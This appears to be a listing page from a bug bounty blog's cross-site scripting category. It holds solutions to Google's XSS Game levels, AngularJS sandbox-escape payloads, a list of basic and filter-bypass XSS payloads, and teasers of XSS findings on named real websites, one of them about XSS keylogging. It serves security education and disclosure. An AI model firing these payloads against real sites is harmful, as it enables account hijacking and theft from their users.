cross site scripting – Open Bug Bounty Blog

Google XSS Game

Posted on May 25, 2021May 25, 2021 by 0xrocky

https://xss-game.appspot.com/

Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page

Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: “welcome” post contains HTML

Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss

Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')

Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')

Stored XSS on h2biz.net

Posted on February 10, 2020February 10, 2020 by 0xrocky

I was surfing the internet when I came across this web portal http://www.h2biz.net which I found to be vulnerable to Reflected XSS. So I attempted to make a Stored XSS because I noticed a kind of message board. I have created a temporary email for registering on the website, then I completed the registration phase….

Stored XSS

Posted on October 17, 2019October 23, 2019 by 0xrocky

I navigated this website: https://www.edilportale.com, an Italian web portal on construction. I found out that it was vulnerable to reflected XSS, as seen in the image.

Stored Cross-site Scripting (XSS) vulnerability in 1MB.site

Posted on April 24, 2019 by WHOISbinit

How I discovered a Stored XSS vulnerability in 1MB.site – Binit Ghimire

How I was able to Discover a Stored Cross-site Scripting (XSS) vulnerability in Flaticon

Posted on April 24, 2019 by WHOISbinit

How I was able to Discover a Stored Cross-site Scripting (XSS) vulnerability in Flaticon – Binit Ghimire

Cross Site Script angular payloads:

Posted on April 2, 2019April 2, 2019 by MiguelSantareno

1.0.1 – 1.1.5

Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 – 1.2.1

Jan Horn (Google)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

List off basic Cross site script playloads

Posted on March 30, 2019April 2, 2019 by MiguelSantareno

"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")> 
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt

'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script> 
><script>alert`1`</script> 
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>

XSS ( Cross Site Scripting ) at Motorola

Posted on March 27, 2019April 22, 2019 by ismailtsdln

How do you use an xss as a keylogger ?

Posted on February 24, 2019February 24, 2019 by ismailtsdln

My name is Ismail Tasdelen. As a security researcher. Today I will be talking about how to use an xss vulnerability as a keylogger. After this post, you’ll notice why a xss vulnerability has a critical vulnerability.

Everything about XSS is in this source!

Posted on February 23, 2019 by ismailtsdln

My name is Ismail Tasdelen. As a security researcher. In this article, I created a resource for you to get better information about xss. There are many xss bypass payloads in this resource, and there are a lot of technical sources. I hope that will be useful.